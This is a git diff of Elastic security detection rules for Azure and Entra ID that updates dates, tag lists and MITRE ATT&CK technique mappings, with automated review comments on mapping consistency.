 author = ["Elastic", "Matteo Potito Giorgio"]
@@ -107,30 +107,31 @@ event.dataset:(azure.activitylogs or azure.signinlogs)
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
+[[rule.threat.technique]]
+id = "T1566"
+name = "Phishing"
+reference = "https://attack.mitre.org/techniques/T1566/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1566.002"
+name = "Spearphishing Link"
+reference = "https://attack.mitre.org/techniques/T1566/002/"
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.signinlogs.properties.user_principal_name"]
diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml
index 67c5edccbc2..7d8818d01ac 100644
--- a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml
+++ b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/05/08"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/17"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -72,21 +72,7 @@ setup = """#### Required Microsoft Entra ID Sign-In and Graph Activity Logs This rule requires the Microsoft Entra ID Sign-In Logs and Microsoft Graph Activity Logs integration to be enabled and configured to collect audit and activity logs via Azure Event Hub. """ severity = "medium" -tags = [ - "Domain: Cloud", - "Domain: Identity", - "Domain: API", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-In Logs", - "Data Source: Microsoft Graph", - "Data Source: Microsoft Graph Activity Logs", - "Use Case: Identity and Access Audit", - "Use Case: Threat Detection", - "Resources: Investigation Guide", - "Tactic: Defense Evasion", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Domain: Identity", "Domain: API", "Tactic: Defense Evasion", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-In Logs", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "esql" 
@@ -190,36 +176,23 @@ from logs-azure.signinlogs-*, logs-azure.graphactivitylogs-* metadata _id, _vers
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1550"
 name = "Use Alternate Authentication Material"
 reference = "https://attack.mitre.org/techniques/T1550/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1550.001"
 name = "Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1550/001/"
-
+[[rule.threat.technique.subtechnique]]
+id = "T1550.004"
+name = "Web Session Cookie"
+reference = "https://attack.mitre.org/techniques/T1550/004/"
 [rule.threat.tactic]
 id = "TA0005"
 name = "Defense Evasion"
 reference = "https://attack.mitre.org/tactics/TA0005/"
-
diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
index fd3737f9131..f7d9735ba39 100644
--- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
+++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/09/01"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -65,16 +65,7 @@ references = [ risk_score = 47 rule_id = "1c6a8c7a-5cb6-4a82-ba27-d5a5b8a40a38" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Audit Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", - "Tactic: Credential Access", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Persistence", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Audit Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" 
@@ -91,34 +82,34 @@ event.dataset: "azure.auditlogs" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1528"
 name = "Steal Application Access Token"
 reference = "https://attack.mitre.org/techniques/T1528/"
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
 reference = "https://attack.mitre.org/tactics/TA0006/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1098"
+name = "Account Manipulation"
+reference = "https://attack.mitre.org/techniques/T1098/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1098.001"
+name = "Additional Cloud Credentials"
+reference = "https://attack.mitre.org/techniques/T1098/001/"
+
+[rule.threat.tactic]
+id = "TA0003"
+name = "Persistence"
+reference = "https://attack.mitre.org/tactics/TA0003/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
index 84bf8f56d93..349868f15fa 100644
--- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
+++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/12/17"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/01/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
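Review bot: The new Persistence entry maps the illicit consent grant to `T1098.001` (Additional Cloud Credentials), a sub-technique whose ATT&CK description centres on adding credentials such as keys, certificates or secrets to a cloud principal; a consent grant adds delegated permissions to an application rather than credentials, so confirm this sub-technique is intended rather than the parent `T1098` entry alone. The retained `T1528` / Credential Access entry is the closer fit for what the audit log actually shows. The tags hunk on L246 already carries `"Tactic: Persistence"`, so the tag side is consistent whichever technique is kept.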
@@ -139,44 +139,34 @@ event.dataset: "azure.signinlogs" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-[[rule.threat.technique]]
-id = "T1566"
-name = "Phishing"
-reference = "https://attack.mitre.org/techniques/T1566/"
-[[rule.threat.technique.subtechnique]]
-id = "T1566.002"
-name = "Spearphishing Link"
-reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
index d8d3ad94d2c..102f666f4aa 100644
--- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
+++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml
@@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/01/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -66,15 +66,7 @@ references = [ risk_score = 47 rule_id = "14fa0285-fe78-4843-ac8e-f4b481f49da9" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: Azure", - "Data Source: Microsoft Entra ID", - "Data Source: Microsoft Entra ID Sign-in Logs", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access", -] +tags = ["Domain: Cloud", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" 
@@ -139,41 +131,31 @@ event.outcome: "success" and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1566.002"
 name = "Spearphishing Link"
 reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml
index f21da0d5140..b650e686492 100644
--- a/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml
+++ b/rules/integrations/azure/initial_access_entra_id_oauth_user_impersonation_scope.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/07/03"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -131,44 +131,21 @@ field_names = [
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-[[rule.threat.technique.subtechnique]]
-id = "T1550.001"
-name = "Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1550/001/"
-
-[[rule.threat.technique]]
-id = "T1656"
-name = "Impersonation"
-reference = "https://attack.mitre.org/techniques/T1656/"
-
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = ["azure.signinlogs.properties.user_principal_name", "azure.signinlogs.properties.app_id"]
diff --git a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml
index 470aa856ca8..eb4ef151eb7 100644
--- a/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml
+++ b/rules/integrations/azure/initial_access_entra_id_powershell_signin.toml
@@ -2,7 +2,7 @@
 creation_date = "2020/12/14"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
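Review bot: This hunk drops the whole Defense Evasion entry (T1550.001 and T1656) and leaves only Initial Access, but no `tags` hunk for this file is in view, so it is worth confirming that the file's `tags` list does not still carry a `Tactic: Defense Evasion` entry; a tactic tag with no matching `[[rule.threat]]` entry would be an orphan. The same check applies to the powershell-signin (Execution removed), user-risk-detected (Credential Access and Command and Control removed), rare-authentication-requirement (Credential Access and Defense Evasion removed) and automation-webhook-created (Resource Development removed) files, whose visible hunks likewise touch only `updated_date` and the threat block. Every other rule in this commit that changes its tactic set also rewrites `tags` in the same commit, so the asymmetry stands out.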
@@ -90,36 +90,18 @@ event.dataset:azure.signinlogs and
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1059"
-name = "Command and Scripting Interpreter"
-reference = "https://attack.mitre.org/techniques/T1059/"
-[[rule.threat.technique.subtechnique]]
-id = "T1059.001"
-name = "PowerShell"
-reference = "https://attack.mitre.org/techniques/T1059/001/"
-
-
-
-[rule.threat.tactic]
-id = "TA0002"
-name = "Execution"
-reference = "https://attack.mitre.org/tactics/TA0002/"
-
diff --git a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml
index 9d467e9edc0..38af402e39f 100644
--- a/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml
+++ b/rules/integrations/azure/initial_access_entra_id_protection_sign_in_risk_detected.toml
@@ -3,7 +3,7 @@ creation_date = "2025/04/29"
 integration = ["azure"]
 maturity = "production"
 promotion = true
-updated_date = "2026/01/07"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -78,17 +78,7 @@ To use this rule, ensure that Microsoft Entra ID Protection logs are being colle
 For information on troubleshooting the maximum alerts warning please refer to this [guide](https://www.elastic.co/guide/en/security/current/alerts-ui-monitor.html#troubleshoot-max-alerts).
 """
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Domain: Identity",
- "Data Source: Azure",
- "Data Source: Entra ID",
- "Use Case: Identity and Access Audit",
- "Use Case: Threat Detection",
- "Use Case: Risk Detection",
- "Tactic: Initial Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Use Case: Risk Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "query"
@@ -122,40 +112,17 @@ value = "low"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
-[rule.threat.tactic]
-id = "TA0001"
-name = "Initial Access"
-reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1110"
 name = "Brute Force"
 reference = "https://attack.mitre.org/techniques/T1110/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1110.003"
 name = "Password Spraying"
 reference = "https://attack.mitre.org/techniques/T1110/003/"
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-
-
-
 [rule.threat.tactic]
 id = "TA0006"
 name = "Credential Access"
@@ -163,17 +130,21 @@ reference = "https://attack.mitre.org/tactics/TA0006/"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
+id = "T1078"
+name = "Valid Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/"
+[[rule.threat.technique.subtechnique]]
+id = "T1078.004"
+name = "Cloud Accounts"
+reference = "https://attack.mitre.org/techniques/T1078/004/"
 [rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
+id = "TA0001"
+name = "Initial Access"
+reference = "https://attack.mitre.org/tactics/TA0001/"
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml
index e70380965a8..d22b4a05914 100644
--- a/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml
+++ b/rules/integrations/azure/initial_access_entra_id_protection_user_risk_detected.toml
@@ -3,7 +3,7 @@ creation_date = "2025/06/02"
 integration = ["azure"]
 maturity = "production"
 promotion = true
-updated_date = "2026/01/07"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -119,58 +119,21 @@ value = "low"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-[[rule.threat.technique]]
-id = "T1556"
-name = "Modify Authentication Process"
-reference = "https://attack.mitre.org/techniques/T1556/"
-
-
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1071"
-name = "Application Layer Protocol"
-reference = "https://attack.mitre.org/techniques/T1071/"
-
-
-[rule.threat.tactic]
-id = "TA0011"
-name = "Command and Control"
-reference = "https://attack.mitre.org/tactics/TA0011/"
-
 [rule.investigation_fields]
 field_names = [
 "@timestamp",
diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml
index da8c29614c4..23eb23df53f 100644
--- a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml
+++ b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/15"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -66,17 +66,7 @@ references = ["https://securityscorecard.com/wp-content/uploads/2025/02/MassiveB
 risk_score = 47
 rule_id = "c766bc56-fdca-11ef-b194-f661ea17fbcd"
 severity = "medium"
-tags = [
- "Domain: Cloud",
- "Domain: Identity",
- "Data Source: Azure",
- "Data Source: Entra ID",
- "Data Source: Entra ID Sign-in",
- "Use Case: Identity and Access Audit",
- "Use Case: Threat Detection",
- "Tactic: Initial Access",
- "Resources: Investigation Guide",
-]
+tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "new_terms"
@@ -123,34 +113,39 @@ event.dataset: "azure.signinlogs" and event.category: "authentication"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1550"
+name = "Use Alternate Authentication Material"
+reference = "https://attack.mitre.org/techniques/T1550/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1550.001"
+name = "Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1550/001/"
+
+[rule.threat.tactic]
+id = "TA0005"
+name = "Defense Evasion"
+reference = "https://attack.mitre.org/tactics/TA0005/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-
 [rule.investigation_fields]
 field_names = [
 "azure.signinlogs.properties.user_principal_name",
diff --git a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml
index 6ec4110788e..d8c10af6a3e 100644
--- a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml
+++ b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/03/10"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -94,52 +94,21 @@ event.dataset: "azure.signinlogs" and event.category: "authentication"
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1078"
 name = "Valid Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1078.004"
 name = "Cloud Accounts"
 reference = "https://attack.mitre.org/techniques/T1078/004/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1110"
-name = "Brute Force"
-reference = "https://attack.mitre.org/techniques/T1110/"
-[[rule.threat.technique.subtechnique]]
-id = "T1110.003"
-name = "Password Spraying"
-reference = "https://attack.mitre.org/techniques/T1110/003/"
-
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1550"
-name = "Use Alternate Authentication Material"
-reference = "https://attack.mitre.org/techniques/T1550/"
-
-
-[rule.threat.tactic]
-id = "TA0005"
-name = "Defense Evasion"
-reference = "https://attack.mitre.org/tactics/TA0005/"
-
 [rule.new_terms]
 field = "new_terms_fields"
 value = [
diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
index a80ea2d7227..7ec92bf9f21 100644
--- a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
+++ b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/30"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2025/12/10"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -74,17 +74,7 @@ setup = """#### Required Microsoft Entra ID Sign-In Logs
 This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration.
 """
 severity = "high"
-tags = [
- "Domain: Cloud",
- "Domain: Identity",
- "Data Source: Azure",
- "Data Source: Entra ID",
- "Data Source: Entra ID Sign-in Logs",
- "Use Case: Identity and Access Audit",
- "Use Case: Threat Detection",
- "Resources: Investigation Guide",
- "Tactic: Initial Access",
-]
+tags = ["Domain: Cloud", "Domain: Identity", "Tactic: Credential Access", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Entra ID", "Data Source: Entra ID Sign-in Logs", "Use Case: Identity and Access Audit", "Use Case: Threat Detection", "Resources: Investigation Guide"]
 timestamp_override = "event.ingested"
 type = "esql"
@@ -193,40 +183,31 @@ from logs-azure.signinlogs-* metadata _id, _version, _index
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
-id = "T1078"
-name = "Valid Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/"
-[[rule.threat.technique.subtechnique]]
-id = "T1078.004"
-name = "Cloud Accounts"
-reference = "https://attack.mitre.org/techniques/T1078/004/"
+id = "T1528"
+name = "Steal Application Access Token"
+reference = "https://attack.mitre.org/techniques/T1528/"
+
+[rule.threat.tactic]
+id = "TA0006"
+name = "Credential Access"
+reference = "https://attack.mitre.org/tactics/TA0006/"
+
+[[rule.threat]]
+framework = "MITRE ATT&CK"
 [[rule.threat.technique]]
 id = "T1566"
 name = "Phishing"
 reference = "https://attack.mitre.org/techniques/T1566/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1566.002"
 name = "Spearphishing Link"
 reference = "https://attack.mitre.org/techniques/T1566/002/"
-
-
 [rule.threat.tactic]
 id = "TA0001"
 name = "Initial Access"
 reference = "https://attack.mitre.org/tactics/TA0001/"
-[[rule.threat]]
-framework = "MITRE ATT&CK"
-[[rule.threat.technique]]
-id = "T1528"
-name = "Steal Application Access Token"
-reference = "https://attack.mitre.org/techniques/T1528/"
-
-
-
-[rule.threat.tactic]
-id = "TA0006"
-name = "Credential Access"
-reference = "https://attack.mitre.org/tactics/TA0006/"
diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml
index 53b7a160471..c41eda20e66 100644
--- a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml
+++ b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml
@@ -2,7 +2,7 @@
 creation_date = "2025/04/23"
 integration = ["azure"]
 maturity = "production"
-updated_date = "2026/03/20"
+updated_date = "2026/03/23"
 [rule]
 author = ["Elastic"]
@@ -79,15 +79,7 @@ references = [
 risk_score = 21
 rule_id = "2a3f38a8-204e-11f0-9c1f-f661ea17fbcd"
 severity = "low"
-tags = [
- "Domain: Cloud",
- "Data Source: Azure",
- "Data Source: Microsoft Graph",
- "Data Source: Microsoft Graph Activity Logs",
- "Resources: Investigation Guide",
- "Use Case: Identity and Access Audit",
- "Tactic: Initial Access",
-]
+tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Initial Access", "Data Source: Azure", "Data Source: Microsoft Graph", "Data Source: Microsoft Graph Activity Logs", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"]
